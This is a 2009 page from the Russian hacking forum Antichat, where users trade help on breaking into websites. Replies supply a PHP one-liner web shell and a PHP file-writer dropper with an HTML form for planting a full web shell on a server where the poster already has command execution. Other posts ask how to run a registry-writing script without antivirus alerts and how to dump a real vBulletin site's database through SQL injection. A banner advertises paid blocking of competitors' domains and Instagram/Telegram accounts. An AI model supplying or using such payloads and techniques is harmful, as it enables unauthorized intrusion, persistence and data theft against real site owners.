Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 506 из 1393

506

Опции темы

Поиск в этой теме

Опции просмотра

#5051

26.01.2009, 18:18

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

https://forum.antichat.ru/showpost.php?p=198446&postcount=3

#5052

26.01.2009, 18:25

Neponomat

Новичок

Регистрация: 23.01.2009

Сообщений: 11

Провел на форуме:
60789

Репутация: 0

Цитата:

Сообщение от j0ker13

2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"

чётат так не юзаеься ) куда это так надо написать?
а если заюзать вот так, но только без оповещения и без удаления в конце. как лучше? антивирус молчит на такие действия

WSHShell = WScript.CreateObject("WScript.Shell"); WSHShell.Popup("Создаем раздел"); WSHShell.RegWrite("HKCU\\MyRegKey\\", "Primer"); WSHShell.Popup("Создаем строковый параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\String", 1); WSHShell.Popup("Создаем параметр DWORD"); WSHShell.RegWrite("HKCU\\MyRegKey\\DWORD", 2, "REG_DWORD"); WSHShell.Popup("Создаем двоичный параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\Binary", 3, "REG_BINARY"); WSHShell.Popup("Удаляем все параметры"); WSHShell.RegDelete("HKCU\\MyRegKey\\String"); WSHShell.RegDelete("HKCU\\MyRegKey\\DWORD"); WSHShell.RegDelete("HKCU\\MyRegKey\\Binary"); WSHShell.Popup("Удаляем раздел"); WSHShell.RegDelete("HKCU\\MyRegKey\\");

Последний раз редактировалось Neponomat; 26.01.2009 в 18:42..

#5053

26.01.2009, 22:33

~~procedure~~

Banned

Регистрация: 22.12.2007

Сообщений: 660

Провел на форуме:
3885269

Репутация: 1158

Видели когда нибудь такие ссылки:
http://wallenberg.ru/component/option,com_contact/task,view/contact_id,1/Itemid,94/

??? Если изменяю, id на -999 допустим, открывается стандартная какая то страница. Почему?

#5054

26.01.2009, 22:39

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

Сообщение от procedure

модреврайт

>> Почему?
Мб потому что значение которое ты указываешь не существует?

__________________
..

#5055

27.01.2009, 08:34

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

Провел на форуме:
5749763

Репутация: 1680

Отправить сообщение для Nightmarе с помощью ICQ

Значит затёрся на одном месте.
Есть в скрипте выполнение php команд.
Хочу залить шелл в одну директорию, права на неё: drwxrwxrwx
Системные команды выполняются, но ни через WGET, ни через copy не заливается шелл... Типа команда выполненна без ошибок, но итог 404
Инклуд тоже не пашет...

Что тут можно предпринять?

#5056

27.01.2009, 10:44

Corwin

Познающий

Регистрация: 01.08.2008

Сообщений: 42

Провел на форуме:
670601

Репутация: 50

в чем проблема заюзать другую качалку вроде lynx

#5057

27.01.2009, 11:12

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Отправить сообщение для groundhog с помощью ICQ

Nightmarе, а что тебе мешает выполнить команду:

Цитата:

echo "<?php system(\$_GET['cmd']); ?>" > shell.php

Пробуй писать полные пути...

#5058

27.01.2009, 11:21

oRb

Members of Antichat - Level 5

Регистрация: 09.05.2008

Сообщений: 304

Провел на форуме:
7875940

Репутация: 2362

groundhog, по сути у него это и есть)

Nightmarе, можно создать файл, как сказал groundhog, только его содержимое будет примерно таким:

PHP код:


		
			
<?php file_put_contents('путь до файла', $_POST['file']); ?>

Далее, создаешь на локале файл:

Код HTML:

<form action='http://site.com/путь_до_получившегося_файла' method='post'>
<textarea name='file'></textarea>
<input type='submit'/>
</form>

Кидаешь в текстарею код шелла, жмешь баттон, и получаешь веб-шел)

#5059

27.01.2009, 20:54

NooB MC

Новичок

Регистрация: 18.11.2008

Сообщений: 7

Провел на форуме:
25855

Репутация: 0

Комрады подскажите!!!
Нужно похекать сайт на vBulletin 3.5.4
На одном из форумов видел SQL INJ - из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'.
Таким образом можно сделать дамп базы данных.
Как должен будет выглядеть запрос?
Мне для начала нужно заняться подборкой полей?
Просто Инъекциями я начал заниматься недавно, в голове полная каша...
помогите разобраться...

#5060

27.01.2009, 21:00

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Цитата:

Мне для начала нужно заняться подборкой полей?

ага, только перед этим еще убедится, что по данному урлу именно sql-inj, а не просто раскрытие пути и т.п.

Страница 506 из 1393

506

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход